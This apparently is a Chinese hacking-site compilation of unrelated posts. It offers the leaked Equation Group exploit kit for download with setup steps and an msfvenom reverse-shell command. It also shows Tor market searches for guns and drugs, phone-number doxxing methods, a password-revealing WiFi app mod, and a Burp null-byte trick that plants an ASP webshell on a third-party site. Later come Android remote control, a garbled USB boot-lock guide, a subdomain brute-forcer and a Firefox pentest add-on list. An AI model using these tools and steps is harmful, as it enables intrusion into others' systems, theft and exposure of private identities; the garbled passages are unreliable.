中国骇客云平台最新公开方程式组织黑客工具,赶紧下载吧!~~~~

GitHub:https://github.com/x0rz/EQGRP_Lost_in_Translation

网盘下载地址:https://yadi.sk/d/NJqzpqo_3GxZA4

解压密码”Reeeeeeeeeeeeeee”

Start.jar //图形界面

EXPLODINGCAN 是 IIS 6.0 远程漏洞利用工具
ETERNALROMANCE 是 SMB1 的重量级利用,可以攻击开放了 445 端口的 Windows XP, 2003, Vista, 7, Windows 8, 2008, 2008 R2 并提升至系统权限。
除此之外 ERRATICGOPHER 、ETERNALBLUE 、ETERNALSYNERGY 、ETERNALCHAMPION 、EDUCATEDSCHOLAR、 EMERALDTHREAD 等都是 SMB 漏洞利用程序,可以攻击开放了 445 端口的 Windows 机器。
ESTEEMAUDIT 是 RDP 服务的远程漏洞利用工具,可以攻击开放了3389 端口的 Windows 机器。
FUZZBUNCH 是一个类似 MetaSploit 的漏洞利用平台。
ODDJOB 是无法被杀毒软件检测的 Rootkit 利用工具。
ECLIPSEDWING 是 Windows 服务器的远程漏洞利用工具。
ESKIMOROLL 是 Kerberos 的漏洞利用攻击,可以攻击 Windows 2000/2003/2008/2008 R2 的域控制器。

Explodingcan IIS漏洞利用工具,只对Windows 2003有影响Eternalromance   SMB 和 NBT漏洞利用工具,影响端口139445 Emphasismine   通过IMAP漏洞攻击,攻击的默认端口为143Englishmansdentist   通过SMTP漏洞攻击,默认端口25Erraticgopher 通过RPC漏洞攻击,端口为445Eskimoroll   通过kerberos漏洞进行攻击,默认攻击端口88Eclipsedwing   MS08-67漏洞利用工具Educatedscholar   MS09-050漏洞利用工具Emeraldthread MB和 Netbios 漏洞利用工具,使用445端口和 139端口Zippybeer   SMTP漏洞利用工具,默认端口 445Eternalsynergy   SMB漏洞利用工具,默认端口 445Esteemaudit   RDP漏洞利用工具,默认攻击端口为3389

 

使用方法:

注意,必须安装32位python2.6相关版本,其他版本不奏效。

  1. 下载python2.6并安装
  2. 下载pywin32并安装
  3. 将C:\Python26添加到环境变量PATH中。

修改\windows\fb.py

注释掉:

 #addplugins(fb, "ListeningPost", LP_DIR,      EDFPlugin)

 

将windows\lib\x86-Windows | x64-Windows  加入到系统环境变量

    1.生成dll命令:msfvenom -p windows/x64/shell_reverse_tcp   LHOST=x.x.x.x LPORT=8888 -f dll > shell.dll

 

转载文章请注明,转载自:中国骇客平台官网www.hackerschina.org

 

中国骇客云教你如何访问暗网

什么是暗网?

所谓的“暗网”,其英文原名叫作“Deep Web”,又称深层网络。

广泛意义上的“暗网”,指的是那些无法被搜索引擎收录内容的站点。也就是说,一切有着非公开访问机制的网站——比如1024,哈哈大家都懂得,甚至一个注册才能进入的小型BBS——都属于“暗网”的一部分;另外,由于搜索引擎对于网站内容的抓取通常都是通过追溯超链接来完成,有着相当多的页面因为没有任何超链接的指向,也处于搜索引擎的盲区,故而它们也被纳入“暗网”的范畴。与“暗网”对应的,是“明网”,也称表层网络(Surface Web),曾有学术机构统计过“暗网”与“明网”分别蕴含的数据比例,结果显示前者的数据存量百倍于后者,且增长速度更快。

提及的软件工具Tor,正是一枚货真价实的钥匙,持有这枚钥匙,就打开了一扇通往“暗网”世界的大门。

Tor(The Onion Router)或许不是网络匿名访问的唯一手段,但毫无疑问它是目前最流行、最受开发者欢迎的。

这个免费、开源的程序可以给网络流量进行三重加密,并将用户流量在世界各地的电脑终端里跳跃传递,这样就很难去追踪它的来源。大部分的Tor用户只把它作为一个匿名浏览网页的工具,不过实际上它潜力十足:Tor软件可以在操作系统后台运行,创建一个代理链接将用户连接到Tor网络。随着越来越多的软件甚至操作系统都开始允许用户选择通过Tor链接发送所有流量,这使得你几乎可以用任何类型的在线服务来掩盖自己的身份。

访问暗网的方法有很多种,目前最流行的则是Tor(The Onion Router洋葱网络),给大家来个示范:

tor下载地址:网上自行搜索即可下载。

这是一个中文版,点击安装:一路安装完成打开:

(这儿配置选择)

都按照红色提示安装:

(选择“是”)

继续

几个都可以尝试一下

(不选择代理)

启动

打开tor浏览器:

等待一会儿链接

(已成功打开)

分享几个暗网导航页:

http://thehiddenwiki.org/ 有点老了,感觉收录并不行

还有一个不错的:

http://grams7enufi7jmdl.onion/ 第一感觉挺像Google 的

随便搜索一个敏感词:gun

(gun的搜索页面)

随便点击一个

一个防ddos的页面,毕竟属于黑产,黑吃黑很正常,随意都要互相防着

进入了登录页面,我们随意注册一下

(登陆)

进去之后,我们进行一下搜索:

看一下搜索栏,呵呵哒了

(drugs类)

(darker工具软件类)

再说一次:

请勿违法!!!我也不会做违法的事!仅供学习了解!技术无罪!

看看刚才搜索到的gun:

0.023BTC可以购买,$9.82很廉价,不多提了。比特币是他们的主要货币,换算的话:

大约1BTC=2 678.2RMB.

不再具体了。。。大家见好就收

暗网  –或许说和血腥很暴力,但是很多或许是事实

比如大天朝的某些“运动”的真相,或者是某些领导人。

不做评价,我保持中立

对了以“onion”为后缀的域名定为暗网,普通浏览器是无法访问的,这就是暗网网址的一个特征。

也有人要说自己家网络别人也访问不到,算不算暗网?

不好意思,你那只能算得上局域网

中国骇客云教你社工之手机信息查询新技能!

如果知道手机号码怎么查身份?大家首先想到的肯定是用搜索引擎搜一下,这里只需提醒一下大家,各种搜索引擎的算法不同,搜索结果也不尽相同,因此要尽量多用一些搜索引擎搜。

有关搜索引擎的使用丁爸公众号之前发送过多篇相关文章,关注“丁爸”公众号回复:搜索   可获取相关文章。



其次我们还可以利用手机安装的一些通讯录和安全软件来核查该手机号的用户名字。


1、电话万能钥匙

具有陌生电话号码云识别的功能,丁爸公众号回复:云识别  可获取历史相关文章

下载地址:http://www.imcaller.com/
2、腾讯手机管家

开通腾讯手机管家后手机可显示来电姓名

下载地址:http://m.qq.com/download/


3、触宝电话

也有陌生号码云识别功能

下载地址:http://www.chubao.cn/


第三,可以通过网站平台核查


4、电话邦

网址:http://www.dianhua.cn/


5、360手机卫士

网址:http://cx.shouji.360.cn/


6、搜狗号码通

http://haoma.sogou.com/rz/


7、百度号码认证

http://haoma.baidu.com/query


8、刑部11司

http://cop163.com/

9、领英

http://www.linkedin.com/

可输入姓名查询职业电话等信息

10、企查查

http://www.qichacha.com/

11、企信宝

http://www.qixin.com/


12、企业信用信息查询APP

http://www.ixy360.com/

 

13、天眼查

http://www.tianyancha.com/

 

第四、通过QQ、支付宝、微信、陌陌、易信、钉钉——–等即时通讯软件查看手机号码关联的网络ID和相关信息。


第五、查询手机注册过的网站,再通过这些网站核查注册人的身份信息。
信息图如下演示:

通过以上的连接查询手机号不错哟。
另外在本地的移动端上面输入手机号 :初始密码直接可以查询该手机号信息。
移动联通的充话费的人有时候不需要密码也是可以查询手机号密码的 你们有没有学会呢?

XSSF是一款XSS漏洞测试平台,该产品可以把XSS漏洞的真实危害暴露出来。这个产品为教学、渗透测试和合法的研究服务。

XSSF通过XSS漏洞与目标浏览器建立连接进行更加深入的攻击利用测试。

XSSF提供强大的API库,并且集成于Metasploit渗透测试框架中。

Windows安装XSSF模块
下载安装Metasploit windows免费版:
http://downloads.metasploit.com/data/releases/metasploit-latest-windows-installer.exe

安装完成后将下xssf源码放到Metasploit安装目录msf3下,同样将XSSF文件夹中的data、lib、modules、plugins与msf3下的文件夹合并即可。

下载xssf源代码:选择最新的3.0下载,下载地址  xssf-3.0

运行metasploit客户端,加载xssf模块:msf > load xssf

BackTrack 5 Metasploit更新方法

虚拟机运行BackTrack5 r3在更新Metasploit时卡在pg-0.15.1,升级报错无法正常升级。

原因是msf并没有用BT5内置的Ruby,而是利用自带的Ruby版本为1.9.1,已经很古老了……所以升级系统的Ruby版本也会无济于事,但是按照下面的步骤更新,即可将msf更新到最新。

解决办法:

找到以下文件打开(注:32位、64位)

然后再找到:

修改为:

然后切换至/opt/metasploit/msf3再运行/opt/metasploit/ruby/bin/bundle install
最后msfupdate!

中国骇客云之killall万能钥匙3.2.16 wifi万能钥匙显密码 去广告

说明:万能钥匙,不是破解密码,是分享wifi密码的软件。

通过这个软件可以获取到别人分享过的wifi从而连接上无线网。但是这个软件广告比较多,并且并不会显示wifi密码。

所以就有了这个修改版,这个修改版去除了程序广告,并且可以把这个wifi密码显示出来。

本软件根据凯旋大神的去广告版本修改,再次表示感谢,绝对同样是深改,其实这是废话了,参考的肯定是完全一致的,和凯旋版本对比,修改的只会多不会少。并且还多出来一个显示密码功能。当然本人也就一部手机,有些细节没办法测试的面面俱到。可能有些机型有些小问题,这个是没办法避免的。。。。

修改给自己使用的版本,顺便分享一下,其他机型请自测,如发现问题请反馈,谢谢!

1、去除界面广告,扁平化图标,更加美观,极致精简仅有6M。

2、去除所有不必要的敏感权限和服务项。

3、去除状态栏通知和退出提醒。

4、去除后台下载广告行为,并让LBE安全大师,360手机卫士扫描不到广告提示。

5、去除地图验证,可以查看地图。

6、去除默认分享密码行为。

7、修改为共存版可与原版同时安装,名称为万能钥匙。

8、归纳软件产生的文件为/Android/data/com.killall.wifilocating/目录,卸载软件会自动清除。

9、不用ROOT手机就能够显示密码,当首次连接上热点自动弹出密码。

题外话:看到有些网友说不知道这个美化版怎么显示密码。只有在第一次连接上一个从未连接过的新wifi热点就弹出密码的。点击“万能钥匙自动连接”,获取到密码就会弹出密码,之后就记住密码不会弹出密码了。如果第一次没看清楚。可以对wifi点一下选择“忘记网络”,这样“万能钥匙自动连接”选项又出来了,再次点击“万能钥匙自动连接”就会重新弹出密码。只有点击“万能钥匙自动连接”才会弹出密码的。另外,之前发布几个版本,有些小白以为LBE安全大师和360安全卫士扫描到修改版万能钥匙有广点通广告。就以为软件广告没有去除干净。其实这只是smali里面一些失去功能的广告代码,这类安全软件扫描到这些失去功能的广告代码也提示有广告,其实去广告只要去除了apk活动项,这些广告代码就相当于是死的了,不会产生广告行为的。软件有没有广告是在界面看得到的。所以这次为了防止那些什么都不懂的小白吐槽,就去除了这些广告代码,虽然也没多大意义。但是估计小白和某些处女座会喜欢。嘿嘿。。。另外请某些素质低的人不要骂人,不喜欢就不要用,没逼你使用。下面直接公布下载地址。支持就不用说了,你们懂的。。。。

可能被修改的太狠 了。万能钥匙从3.2.16开始更新了SO签名校验,我对SO修改这块技术太渣,分析了很久找不到绕过方法,就懒得分析了,所以直接使用空道大神的HOOK模块给通杀签名校验了,这样可能导致某些不支持HOOK的X86型号的安卓手机没办法搜到可用热点,但是支持绝大多数手机的。如果发现搜索不到可用的热点,建议使用我之前修改的旧版。万能钥匙这个软件没必要一直追新,实际上大多时候只是更新了个版本号,软件界面和广告,wifi密码服务器还是一样的,并不会影响使用效果,也不会能够多扫描到可用热点。

因法律法规及政策原因,已停止提供下载

中国骇客云之Burp suite网站攻击利器快速处理上传截断

Burp suite是一个安全测试框架,它整合了很多的安全工具,对于渗透的朋友来说,是不可多得的一款囊中工具包,今天笔者带领大家来解读如何通过该工具迅速处理“截断上传”的漏洞。如果对该漏洞还不熟悉,就该多去网上学习下。

由于该工具是通过Java写的,所以需要安装JDK,关于JDK的安装,笔者简单介绍下。基本是傻瓜化安装,安装完成后需要简单配置下环境变量,右键”我的电脑”->”属性”一>”高级”一>”环境变量”,在系统变量中查找Path,然后点击编辑,把JDK的bin目录写在path的最后即可。

通过CMD执行下javac看是否成功安装。安装配置成功则会显示下图信息。

这里的测试网址是笔者帮朋友测试某站点时获取的,登陆后台后可以发表新闻,但是只能上传图片,然后发现新闻的图片目录在upload/newsimg下。

后台有个”网站资料设置”的功能,可以自行定义新闻图片的路径,但是当尝试把新闻图片路径改为“upload/newsimg.asp/”时,上传图片竟然上传失败了,所以这种方法失效。

接下来我们尝试上传截断漏洞,可能大家经常用的是通过WSockExpert抓包,修改后通过nc来提交获取shell,但是大家会发现那样有点繁琐,我们看看今天的方法是多么高效!

QQ截图20170314135253.png

首先运行Burp suite允许burpsuite.jar,然后点击“proxy”标签,会发现burp suite默认的代理监听端口为8080,如果怕跟自己电脑上的某个端口冲突的话,可以点击“edit”进行编辑。笔者使用默认端口。

然后打开本地浏览器的代理设置的地方,IE一般为“工具”->“Internet选项”->“连接”->“局域网设置”,其他浏览器大致相同。

设置代理之后,我们到后台的某个上传新闻图片的地方上传一个图片木马,我这里的图片木马为asp一句话。

点击上传之后,我们到proxy的“history”选项,会发现该(本文来自危险漫步博客)网站的某个POST提交请求,我们选中该链接后,右键选择“send to repeater”。

我们会发现刚才提交的请求的数据包,那么我们看一下,有一项是上传路径的地方,我们以前进行截断上传的时候经常修改这个地方,这次也不例外,我们把上传路径改为”upload/shell.asp”后面有一个空格。

然后选择”hex”进入16进制编辑模块,将空格的16进制20改为00,即null。

然后点击上方的“go”即可进行数据包的提交,提交成功后会返回提交的路径,笔者通过菜刀就直接连接到一句话后门了。大家进行测试吧!

中国骇客云工具远控工具之手机远控远程控制你的Android手机

谈到远程控制android手机软件,很早之前,德国开发的Teamviewer软件即已经做到在电脑和手机之间灵活的双向切换控制操作,稍微略显不足的地方就是Teamviewer只支持安卓系统的手机。现在危险漫步要给大家介绍的这款软件是Webkey,不但支持安卓系统手机的操作,同时可以摆脱数据线连接,在无线的网络中远程控制手机。这里以三星手机T959为例(很普通的手机,请不要扔番茄和鸡蛋)。点击我们下载下来的webkey.apk安装文件(可以直接通过数据线连接手机安装或是有wifi的,安装一个豌豆荚连接下,双击安装),红色圆圈出来的即是已经安装的webkey软件。

2K5N03D2H2X{K8G`M{83E)I.jpg

这样就完成了安装过程。这个软件的一个优点就是可以通过网络来执行远程控制操作,摆脱数据线的困扰,只要你连接上wifi,即可以很方便的操作。当然不可缺少的条件就是你的手机必须是root权限,之前应该是有不少合约机,出厂并未激活root.貌似现在应该大多都会有root权限了。

下面需要对webkey进行简单的设置,取消开机启动。这样一来就可以避免每次手机在换电池或是做其他操作的过程中因为重启而每次开机都启动webkey。

去除手机上方状态栏显示webkey的图标状态,尽管去除了,但是webkey-样会在系统后台继续运行。完成开机和运行状态的一个设置。

只要保证“保持与androdwebkey的连接”和“允许浏览器中注册新用户”两个选项被选中就可以。“使用此IP地址连接DynDNS”,这个选项是你有获取公网地址,并将地址解析到外网的网站上,通过这个来访问。这边就跳过,有兴趣的朋友可以去注册一个域名站点进行测试。

点击“手机昵称设置”按钮进行对呢称的简单设置。帮你的手机设置一个好记的名称。往后通过浏览器远程控制手机的时候,访问的管理地址就是Webkey的域名加上你手机昵称路径,比如这里的jihn就是你的手机昵称了。既然可以通过wifi连接网络远程控制你的手机,webkey也给出了手机在网络中自动获取的一个IP地址,你一样可以通过输入172.18.14.233来管理访问你的手机,这里172.18.14.233就是你局域网分配给你手机的IP地址。下一步,也是比较重要的一步操作,那就是用户管理了。当然要设置成不是每个用户都可以远程控制你的手机。让我们自己动手来为手机创建一个新用户吧。这样设置完成后,我们将手机和电脑都连接到互联网上之后,就可以对手机进行远程控制了。不通过手机数据线的哦。上面提到的第5个设置步骤中有讲到局域网的分配给手机的IP地址,这里也可以通过外网远程控制你的手机,也就是获知手机的公网IP的话,一样可以是手机在家,人在公司或是路上,前提是要有wifi,呵呵,连接控制你的手机是没问题的。查看手机公网地址可以通过手机浏览器访问诸如ip138或是114best来查看手机所在的公网IP地址。以下简单示范局域网内如何远程控制手机。

打开桌面的浏览器访问androidwebkey或者是192.168.1.102,就可以看到远程控制管理界面了。图片显示的页面地址源显示未知,实际上是来自美国的IP地址,只是网站数据库没有收录而已,不影响操作控制。这边就提示要求我们输入用户名和密码,也就是我们在上述操作中谈到的第6个步骤中的用户和密码。在这个简洁的管理页面中,给大家分享下远程控制管理的功能。

(1)页面布局

大致的页面布局如下:顶端是功能导航条,页面左边显示的是手机的实时远控屏幕。右边是操作的功能菜单,右下方还有个远程聊天窗口。一起来了解一下每个标签页的具体应用。

(2)电话选项卡

这是比较常用的功能,同样是登录控制台后的第一个页面。设置完成之后可以在远程界面中用鼠标直接操作你的手机,譬如设置呼叫转移。

远控区最下方的一排功能键是Webkey为手机设置的,它等同于手机上的物理按键,更有趣的是,按键的键值还可以自行更改设置。

(3)功能菜单

右边的功能菜单也很丰富,基本的远程控制操作都可以在这里实现:远程键盘、打开网址、运行程序、手机信息、关闭进程等。个人比较喜欢的是远程键盘,相信可以用键盘代替手机的输入法或者是手写,速度应该是有很大的提升。像手机信息或是关闭进程一样是很实用的一些功能。

(4) GPS

这是个很强大的功能,可以起到防止手机被盗的效果。一旦你的手机被偷走,就可以知道手机的位置。呵呵,本人手机是不怎么好,应该是不会引起兴趣了,不过一样可以起到防范未然的效果,还可以定位最后已知手机的位置。而且提供了两种定位方式,在室外可以通过GPS卫星精确定位,倘若手机在室内还可以得到运营商定位。是不是很好用的GPS呢?

(5)短信和通话列表

这两个功能很简单,可以实现远程收发短信,查看通话记录详情。这样即使你手机忘记带也可以知道手机上的一些通话来往的情况,清楚是谁发了短信给你了。并且你可以远程控制你的手机给人家回复,这一切只需要你在电脑上通过网络直接在这个管理页面操作,简单方便,快捷,不需要再时不时的担心你的手机是否随身携带或是烦恼手写输入或是手机键盘给对方发短信的速度太慢。

(6) Net

这是一个很实用的功能,前提是要拥有root权限。通过net可以帮助你了解你的手机网络流量使用情况,包括各个网络接口,也就是和tcp,udp收发包一样的记录信息,按日统计,(7)通知和终端

这两个选项卡可能对普通用户用处不大。通知的意思是Webkey会每隔半分钟刷新一次,显示未读信息及未接电话,当操作触发时,手机会按照你预先设置的提醒方式来显示内容。终端就是一个远程命令行,你可以通过它在shell命令行下面运行Linux指令。

(8)导出

这个功能也是相当的不错。不过在当你手机失窃并基本回归无望的时候才用到它。它能帮你远程获取手机里的联系人、短信、通话记录,然后就像豌豆荚或是91助手一样可以导出这些信息并保存到本地电脑硬盘中。

(10)目录浏览和SD存储卡

这两个功能就相当于是利用wifi连接网络后,在局域网内进行远程文件管理器。采用了Aj aXplorer组件,让远程文件管理也很方便。

你还可以远程从你手机里下载SD卡里的任何文件传输或者拷贝到其他位置,如果是图片文件的话,还可以远程预览图片。

结尾再和大家聊一下以下几点事项:

这个应用软件属于高级玩家应用,需要一定的动手操作能力。因为有的功能需要对手机ROOT(合约机可能不太合适做这个操作了)。

要通过电脑对手机进行远程控制,那么你的手机必须保持网络在线并连通。通过网络控制手

机时,可能产生较大流量,请确定你有足够的流量,并保证手机实时在线。建议手机还是使用wifi连接互联网网络,这样一来和电脑可以很融洽的在一个网络内进行对话操作。

好了,希望大家感兴趣的话,可以自己尝试安装软件来试试看,有兴趣的话可以到我的博客上面与危险漫步进行指导和交流。

中国骇客云教你使用U盘制作进入系统的中钥匙

如今U盘容量越来越大而且价钱越来越低,因而普及率十分之高,置信大家们也动手一个。想不想用U盘作爲开启XP大门的钥匙来维护你的爱机呢?这样他人就会由于没有对应的U盘钥匙而无法开机,平安性自是大爲进步。制造办法十分复杂,也不需第三方软件,只是应用XP本身的工具一组战略,只需3步走。

第一步:先把U盘插上,然后双击翻开“我的电脑”,检查一下本人U盘在Windows XP中

所分配的盘符,我的盘符爲K,将恣意一团体文件复制到U盘的根目录中,我把一个照片放到了外面名字爲“U.JPG”。

第二步:翻开Windows XP的记事本顺序,输出一条命令:if not exist K:\u.jpg shutdown -s -f -t

3 -c”Sorry,你不是本机主人,回绝开机!”

W~$VUM7PH}NBEX_Z@OWH1_N.jpg

其中的“shutdown”既爲关机命令,“-s”爲关机的参数,“-r”爲重启,“-f”爲强迫关机,“-t”后门跟的是倒计时3秒,“-c”提示的关机阐明。本命令的意思是:假如在K盘上我不到“U.jpg”这个文件的话,就显示”Sorry,你不是本机主人,回绝开机!”,之后过3秒就自动关机。当然,假如你在第一步中复制的是“HackerXfiles.mp3”MP3文件也行,只需在相应的命令行中修正一下就可以了。然后将文本另存爲“Check.bat”。将寄存途径定位于Windows XP’的零碎盘C:\WINDOWS\system32\GroupPolicy\Machine\Scripts\Startup中(由于GroupPolicy文件夹默许爲隐藏,请先在“文件夹选项”中将其显示,文件的扩展名改爲bat

型,文件名可恣意改,如hackXfiles.bat。

第三步:翻开命令符,间接按Win+R,在外面输出“gpedit.msc”。找到“本地计算机”战略——“计算机配置”——“Windows设置”——“脚本(启动/关机)”,然后双击右侧中的“启动”项;在弹出的“启动属性”窗口中单击“添加”按钮,然后在弹出的“添加脚本”窗口中单击“旅游”按钮,Windows XP会自动定位于零碎盘C:\WINDOWS\system32\GroupPolicy\Machine\Scripts\Startup文件夹,单击迭中刚生成的Check.bat批处置文件后在单击“翻开”按钮;之后单击一次“启动”窗口中的“确定”按钮,最初封闭组战略窗口。

OK,一把完满的U盘钥匙曾经打造出来了,只需再启动XP之前将U盘插到主机上。等运转脚本时分会判别能否存在文件“U.JPG”,假如没有发现文件就会3秒后强迫关机,拿起手中的U盘赶快试一下吧!

渗透神器之:Layer子域名挖掘机4.2纪念版增加功能 中国骇客云平台工具下载

下载地址连 接 链 接: https://pan.baidu.com/s/1pLoGnDh 密码: g3f6

更新内容如下:
1、降级.NET版本至4.0,因之前有人反馈WIN2003无法使用,因为2003不能安装.NET4.5,现在win2003及XP都可以正常使用。
2、增加获取web服务器信息的功能,如果在渗透过程中,担心软件自动访问web服务器会记录到web日志,可以关闭获取WEB服务器信息功能
3、增加线程控制,因有不少人反馈,开全速的时候,他们的小电脑会卡死,反正我电脑跑起来妥妥的,所以默认设置为全速。
4、增加右键复制所选项,胖子硬提出的需求。
5、修复了一个线程锁的问题,没修复前会引起程序崩溃。
PS:为了适应不同的分辨率,首次启动设置了全屏,可点击右上角的最大化按钮复位到我截图的这个小窗口。

使用说明:
1.如果要使用自定义字典,请把字典文件命名为dic,放到跟程序同目录下,程序会自动加载字典。
2.如果没有自定义字典,程序会自动使用内置字典,内置字典总共两万多条数据,内容包括了常用子域名,以及3000+常用单词和1-3位所有字母。
3.如果要爆破二级以下域名,可以直接填入要爆破的子域名,程序会自动拼接下一级子域。比如填入baidu.com,程序会爆破baidu.com下面的域。
4.如果界面列表显示有空白,请右键选择“导出域名和IP”来导出完整列表。

百度网盘下载:下载地址连 接 链 接: https://pan.baidu.com/s/1pLoGnDh 密码: g3f6

Extensions For Turning Firefox Into a Penetration Testing Tool 中国骇客云之火狐浏览器渗透工具下载!

Firefox is a popular web browser from Mozilla. Popularity of Firefox is not only because it’s a good web browser, it also supports add-ons to enhance the functionality. Mozilla has a websiteadd-on sectionthat has thousands of useful add-ons in different categories. Some of these add-ons are useful for penetration testers and security analysts. These penetration testing add-ons helps in performing different kinds of attacks, and modify request headers direct from the browser. This way, it reduces the use of a separate tool for most of the penetration testing related tasks.

LEARN PENETRATION TESTING FROM TOP HACKERSLEARN PENETRATION TESTING FROM TOP HACKERS

In this brief post, we are listing a few popular and interesting Firefox add-ons that are useful for penetration testers. These add-ons vary from information gathering tools to attacking tools. Use what you think helpful. All these add-ons are available for free and you can download from the Mozilla add-on website. There are some premium add-ons like Dominator pro which is also available for purchase from official websites. See the list of free add-ons below.

Firefox Add-ons for Security Researchers and Penetration Testers

  1. FoxyProxy Standard
    FoxyProxy is an advanced proxy management add-on for Firefox browser. It improves the built-in proxy capabilities of Firefox. There are few other similar kind of proxy management add-ons available, but it offers more features that other add-ons. Based on the URL patterns, it switches internet connection across one or more proxy servers. When proxy is in use, it also displays an animated icon. In case you want to see the proxies used by the tool, you can see the logs.

    AddFoxyProxyto you browser from this link:https://addons.mozilla.org/en-US/firefox/addon/foxyproxy-standard/

  2. Firebug
    Firebug is a nice add-on that integrates a web development tool inside the browser. With this tool, you can edit and debug HTML, CSS and JavaScript live in any webpage to see the effect of changes. It helps in analyzing JS files to find XSS vulnerabilities. It’s an really helpful add-on in finding DOM based XSS for security testing professionals.AddFirebugin your Browser from this link:https://addons.mozilla.org/en-US/firefox/addon/firebug/
  3. Web Developer
    Web Developer is another nice add-on that adds various web development tools in the browser. It helps in web application penetration testing.AddWeb Developerin your browser from this link:https://addons.mozilla.org/de/firefox/addon/web-developer/

  4. User Agent Switcher
    User Agent Switcher add-on; adds a one click user agent switch to the browser. It adds a menu and tool bar button in the browser. Whenever you want to switch the user agent, use the browser button. User Agent add on helps in spoofing the browser while performing some attacks.

    AddUser Agent Switcherto your browser from this link:https://addons.mozilla.org/en-US/firefox/addon/user-agent-switcher/

  5. Live HTTP Headers
    Live HTTP Headers is a really helpful penetration testing add-on for Firefox. It displays live headers of each http request and response. You can also save header information by clicking on the button in the lower left corner. I don’t think that there is any kind of need to tell how important this add-on is for the security testing process.AddLive HTTP Headersto Firefox with this link:https://addons.mozilla.org/en-US/firefox/addon/live-http-headers/

  6. Tamper Data
    Tamper Data is similar to the Live HTTP Header add-on but, has header editing capabilities. With the tamper data add-on, you can view and modify HTTP/HTTPS headers and post parameters. Thus it helps in security testing web application by modifying POST parameters. It can be used in performing XSS and SQL Injection attacks by modifying header data.Add theTamper dataadd-on to Firefox browser with this link:https://addons.mozilla.org/en-US/firefox/addon/tamper-data/

  7. Hackbar
    Hackbar is a simple penetration tool for Firefox. It helps in testing simple SQL injection and XSS holes. You cannot execute standard exploits but you can easily use it to test whether vulnerability exists or not. You can also manually submit form data with GET or POST requests. It also has encryption and encoding tools. Most of the times, this tool helps in testing XSS vulnerability with encoded XSS payloads. It also supports keyboard shortcuts to perform various tasks.I am sure, most of the persons in the security field already know about this tool. This tool is mostly used in finding POST XSS vulnerabilities because it can send POST data manually to any page you like. With the ability of manually sending POST form data, you can easily bypass client side validations of the page. If your payload is being encoded at client side, you can use an encoding tool to encode your payload and then perform the attack. If the application is vulnerable to the XSS, I am sure you will find the vulnerability with the help of the Hackbar add-on on Firefox browser.AddHackbaradd-on to Firefox browser with this link:https://addons.mozilla.org/en-US/firefox/addon/hackbar/
  8. Websecurify
    Websecurify is a nice penetration testing tool that is also available as add-on for Firefox. We have already covered WebSecurify in detail in previous article. WebSecurify can detect most common vulnerabilities in web applications. This tool can easily detect XSS, SQL injection and other web application vulnerability. Unlike other listed tools, it is a complete penetration testing tool in itself available as a browser add-on. It gives most of the features available in standalone tool.AddWebSecurifyto Firefox browser with this link:https://addons.mozilla.org/en-us/firefox/addon/websecurify/

  9. Add N Edit Cookies
    “Add N Edit Cookies” is a cookie editing add-on that allows you to add and edit cookies data in your browser. With this tool, you can easily add session data manually in cookies. This tool is performed in session hijacking attack when you have the active cookies of the user. Edit your cookies to add the data and hijack the account.To downloadAdd N Edit Cookiesto Your Firefox browser:https://addons.mozilla.org/en-US/firefox/addon/add-n-edit-cookies-13793/

  10. XSS Me
    Cross Site Scripting is the most found web application vulnerability. For detecting XSS vulnerabilities in web applications, this add-on can be a useful tool. XSS-Me is used to find reflected XSS vulnerabilities from a browser. It scans all forms of the page, and then performs an attack on the selected pages with pre-defined XSS payloads. After the scan is complete, it lists all the pages that renders a payload on the page, and may be vulnerable to XSS attack. Now, you can manually test the web page to find whether the vulnerability exists or not.AddXSS Me
    to your Firefox browser:https://addons.mozilla.org/en-us/firefox/addon/xss-me/

  11. SQL Inject Me
    SQL Inject Me is another nice Firefox add-on used to find SQL injection vulnerabilities in web applications. This tool does not exploit the vulnerability but display that it exists. SQL injection is one of the most harmful web application vulnerabilities, it can allow attackers to view, modify, edit, add or delete records in a database.The tool sends escape strings through form fields, and tries to search database error messages. If it finds a database error message, it marks the page as vulnerable. QA testers can use this tool for SQL injection testing.AddSQL Inject Me
    add-on to your browser:https://addons.mozilla.org/en-us/firefox/addon/sql-inject-me/

  12. FlagFox
    FlagFox is another interesting add-on. Once installed in the browser, it displays the country’s flag to tell the location of the web server. It also comes with other tools like whois, WOT scorecard and ping.AddFlagFoxin your browser:https://addons.mozilla.org/en-us/firefox/addon/flagfox/

  13. CryptoFox
    CryptoFox is an encryption or decryption tool for Mozilla Firefox. It supports most of the available encryption algorithm. So, you can easily encrypt or decrypt data with supported encryption algorithm. This add-on comes with dictionary attack support, to crack MD5 cracking passwords. Although, it hasn’t have good reviews, it works satisfactorily.AddCryptoFoxadd-on to your browser:https://addons.mozilla.org/en-US/firefox/addon/cryptofox/

  14. Access Me
    Access Me, is another add-on for security testing professionals. This add-on is developed by the company that works on XSS Me and SQL Inject Me. Access Me is the can Exploit-Me tool used for testing access vulnerabilities in web applications. This tool works by sending several versions of page requests. A request using the HTTP HEAD verb and a request using a made up SECCOM verb will be sent. A combination of session and HEAD/SECCOM will also be sent.AddAccess Meto Firefox from this link:https://addons.mozilla.org/en-US/firefox/addon/access-me/

  15. SecurityFocus Vulnerabilities search plugin
    SecurityFocus Vulnerabilities search plugin, is not a security tool but a search plugin that lets users search for vulnerabilities from the Security Focus database.Add this to Firefox from the link:https://addons.mozilla.org/en-us/firefox/addon/securityfocus-vulnerabilities-/
  16. Packet Storm search plugin
    This is another search plugin that lets users search for tools and exploits from packetstormsecurity.org. The website offers free up-to-date security tools, exploits and advisories.Add this to Firefox from the link:https://addons.mozilla.org/en-us/firefox/addon/packet-storm-search-plugin/
  17. Offsec Exploit-db Search
    This is another plugin similar to the last two above. It also lets users search for vulnerabilities and exploits listed in exploit-db.com. This website is always up-to-date with latest exploits and vulnerability details.Add this to Firefox from the link:https://addons.mozilla.org/en-us/firefox/addon/offsec-exploit-db-search/
  18. Snort IDS Rule Search
    Snort IDS Rule Search is another search add-on for Firefox. It lets users search for Snort IDS rules on the snort.org website. Snort is the most widely deployed IDS/IPS technology worldwide. It’s an open source network Intrusion prevention and detection system with more than 400,000 users.AddSnort IDS Rule Searchto Firefox here:https://addons.mozilla.org/en-US/firefox/addon/snort-ids-rule-search/

These are few add-ons that you can use while web application penetration testing. Although, you cannot finish complete penetration testing work with these tools, but these browser tools are useful for most of the tasks and reduce the use of separate tools.

Hackbar, SQL Inject Me, XSS Me and WebSecurify are the browser tools that are widely used for finding vulnerabilities in web applications. Other tools are used for specific work which helps in getting information while penetration testing.

How to install these add-ons in the Firefox browser

